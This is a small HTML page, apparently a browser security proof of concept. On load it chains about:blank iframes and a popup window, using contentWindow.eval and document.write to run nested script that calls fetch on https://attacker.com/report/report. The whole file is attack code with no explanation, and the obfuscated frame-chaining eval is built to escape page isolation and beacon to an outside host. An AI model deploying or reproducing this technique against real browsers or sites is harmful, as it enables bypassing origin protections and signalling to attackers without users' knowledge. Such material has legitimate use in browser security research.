<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGUJuvxGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGUJuvxGGGGG.onload=_=>GGGGGUJuvxGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGUJuvxGGG src=about:blank><\/iframe><script>GGGUJuvxGGG.onload=_=>GGGUJuvxGGG.contentWindow.eval(\x22fetch(`https://attacker.com/report/report`)\x22);GGGUJuvxGGG.contentWindow.location.reload();<\/script>');");GGGGGUJuvxGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>